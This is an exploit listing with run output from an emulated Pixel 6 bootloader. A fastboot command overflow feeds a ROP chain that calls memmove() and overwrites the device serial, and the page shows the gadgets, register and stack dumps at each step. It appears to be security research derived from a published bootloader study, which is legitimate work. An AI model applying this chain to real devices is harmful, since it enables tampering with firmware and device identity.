Share
## https://sploitus.com/exploit?id=FDF8A206-EAB1-5C03-BF73-61095BBB3EEA
# Updating ABL serial with ROP:

When ran this notebook will load ABL and attempt to update the device's serial number via ROP chain to call memmove(). Derived from eShard's https://github.com/eshard/pixel6-boot/blob/main/run_abl_public.ipynb whilst following along with https://eshard.com/posts/pixel6_bootloader

# Output

```
partition misc not found
failed to read misc(vendor) partition -2
[   0.000000] [E] [PXL] could not get charger state -27
[   0.000000] [I] [PXL] boot voltage threshold=3400mV

##### INTERRUPT
0xffff0000f880d3e0:	mov	x20, x0
^ Got interrupt 0d ffff0000f880d3e0. Skipping instruction.


start_app hook:
0xffff0000f88105a0:	ret	

fastboot_menu_start hook:
0xffff0000f887be94:	ret	


>>> fastboot_read:
[   0.000000] [I] [FB] Accept cmd:flashing unlock
<<< INFOdevice already unlocked
<<< OKAY
>>> fastboot_read:
[   0.000000] [I] [FB] Accept cmd:oem dmesg
<<< OKAY
>>> fastboot_read:
[   0.000000] [I] [FB] Accept cmd:getvar:serialno
<<< OKAYDAAAAABBBBAAAAAA
>>> fastboot_read:
[   0.000000] [I] [FB] Accept cmd:
<<< FAILvariable (serialnoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>>> Exiting

0xffff0000f8815a84:	mov	sp, x29
0xffff0000f8815a88:	ldp	x20, x19, [sp, #0x30]
0xffff0000f8815a8c:	ldp	x22, x21, [sp, #0x20]
0xffff0000f8815a90:	ldp	x24, x23, [sp, #0x10]
0xffff0000f8815a94:	ldp	x29, x30, [sp], #0x40
0xffff0000f8815a98:	ret	
 
## REGISTERS ##
X0 -        0
X1 -       40
X2 - FFFF0001047FEEF0
X3 -        0
X8 -        0
X19 - DEADBEEFDEADBE19
X20 - DEADBEEFDEADBA20
X21 - 4343434343434343
X22 - 4343434343434343
X23 - 4343434343434343
X24 - 4343434343434343
X28 -        0
X29 - 4444444444444444
X30 - FFFF0000F880C924
SP - FFFF000090700040
PC - FFFF0000F8815A98

## STACK DUMP ##
SP: ffff000090700040
@ffff000090700040 deadbeefdeadbe29 - #0
@ffff000090700048 ffff0000f8884684 - #8
@ffff000090700050 deadbeefdeadbe24 - #10
@ffff000090700058 ffff000090700070 - #18
@ffff000090700060 ffff0000f887e2d4 - #20
@ffff000090700068 ffff0000f8ac0058 - #28
@ffff000090700070 10 - #30
@ffff000090700078 deadbeefdeadb119 - #38
@ffff000090700080 ffff000090700090 - #40
@ffff000090700088 ffff0000f886fb88 - #48
 
Checking serial: DAAAAABBBBAAAAAA

0xffff0000f880c924:	ldp	x20, x19, [sp, #0x30]
0xffff0000f880c928:	ldp	x22, x21, [sp, #0x20]
0xffff0000f880c92c:	ldp	x24, x23, [sp, #0x10]
0xffff0000f880c930:	ldp	x29, x30, [sp], #0x40
0xffff0000f880c934:	ret	
 
## REGISTERS ##
X0 -        0
X1 -       40
X2 - FFFF0001047FEEF0
X3 -        0
X8 -        0
X19 - DEADBEEFDEADB119
X20 -       10
X21 - FFFF0000F8AC0058
X22 - FFFF0000F887E2D4
X23 - FFFF000090700070
X24 - DEADBEEFDEADBE24
X28 -        0
X29 - DEADBEEFDEADBE29
X30 - FFFF0000F8884684
SP - FFFF000090700080
PC - FFFF0000F880C934

## STACK DUMP ##
SP: ffff000090700080
@ffff000090700080 ffff000090700090 - #0
@ffff000090700088 ffff0000f886fb88 - #8
@ffff000090700090 5245535f4c495645 - #10
@ffff000090700098 504f525f4c4149 - #18
@ffff0000907000a0 0 - #20
@ffff0000907000a8 0 - #28
@ffff0000907000b0 0 - #30
@ffff0000907000b8 0 - #38
@ffff0000907000c0 0 - #40
@ffff0000907000c8 0 - #48
 
Checking serial: DAAAAABBBBAAAAAA

0xffff0000f8884684:	ldr	x1, [x23, #0x10]
0xffff0000f8884688:	mov	x0, x21
0xffff0000f888468c:	mov	x2, x20
0xffff0000f8884690:	blr	x22
 
## REGISTERS ##
X0 - FFFF0000F8AC0058
X1 - FFFF000090700090
X2 -       10
X3 -        0
X8 -        0
X19 - DEADBEEFDEADB119
X20 -       10
X21 - FFFF0000F8AC0058
X22 - FFFF0000F887E2D4
X23 - FFFF000090700070
X24 - DEADBEEFDEADBE24
X28 -        0
X29 - DEADBEEFDEADBE29
X30 - FFFF0000F8884684
SP - FFFF000090700080
PC - FFFF0000F8884690

## STACK DUMP ##
SP: ffff000090700080
@ffff000090700080 ffff000090700090 - #0
@ffff000090700088 ffff0000f886fb88 - #8
@ffff000090700090 5245535f4c495645 - #10
@ffff000090700098 504f525f4c4149 - #18
@ffff0000907000a0 0 - #20
@ffff0000907000a8 0 - #28
@ffff0000907000b0 0 - #30
@ffff0000907000b8 0 - #38
@ffff0000907000c0 0 - #40
@ffff0000907000c8 0 - #48
 
Checking serial: DAAAAABBBBAAAAAA

0xffff0000f887e2d4:	bl	#0xffff0000f8876b58
 
## REGISTERS ##
X0 - FFFF0000F8AC0058
X1 - FFFF000090700090
X2 -       10
X3 -        0
X8 -        0
X19 - DEADBEEFDEADB119
X20 -       10
X21 - FFFF0000F8AC0058
X22 - FFFF0000F887E2D4
X23 - FFFF000090700070
X24 - DEADBEEFDEADBE24
X28 -        0
X29 - DEADBEEFDEADBE29
X30 - FFFF0000F8884694
SP - FFFF000090700080
PC - FFFF0000F887E2D4

## STACK DUMP ##
SP: ffff000090700080
@ffff000090700080 ffff000090700090 - #0
@ffff000090700088 ffff0000f886fb88 - #8
@ffff000090700090 5245535f4c495645 - #10
@ffff000090700098 504f525f4c4149 - #18
@ffff0000907000a0 0 - #20
@ffff0000907000a8 0 - #28
@ffff0000907000b0 0 - #30
@ffff0000907000b8 0 - #38
@ffff0000907000c0 0 - #40
@ffff0000907000c8 0 - #48
 
Checking serial: DAAAAABBBBAAAAAA

0xffff0000f887e2d8:	mov	w0, wzr
0xffff0000f887e2dc:	ldp	x29, x30, [sp], #0x10
0xffff0000f887e2e0:	ret	
 
## REGISTERS ##
X0 -        0
X1 - FFFF000090700090
X2 -       10
X3 -        0
X8 - FFFF0000F8AC0058
X19 - DEADBEEFDEADB119
X20 -       10
X21 - FFFF0000F8AC0058
X22 - FFFF0000F887E2D4
X23 - FFFF000090700070
X24 - DEADBEEFDEADBE24
X28 -        0
X29 - FFFF000090700090
X30 - FFFF0000F886FB88
SP - FFFF000090700090
PC - FFFF0000F887E2E0

## STACK DUMP ##
SP: ffff000090700090
@ffff000090700090 5245535f4c495645 - #0
@ffff000090700098 504f525f4c4149 - #8
@ffff0000907000a0 0 - #10
@ffff0000907000a8 0 - #18
@ffff0000907000b0 0 - #20
@ffff0000907000b8 0 - #28
@ffff0000907000c0 0 - #30
@ffff0000907000c8 0 - #38
@ffff0000907000d0 0 - #40
@ffff0000907000d8 0 - #48
 
Checking serial: EVIL_SERIAL_ROP

>>> PC = 0x0
```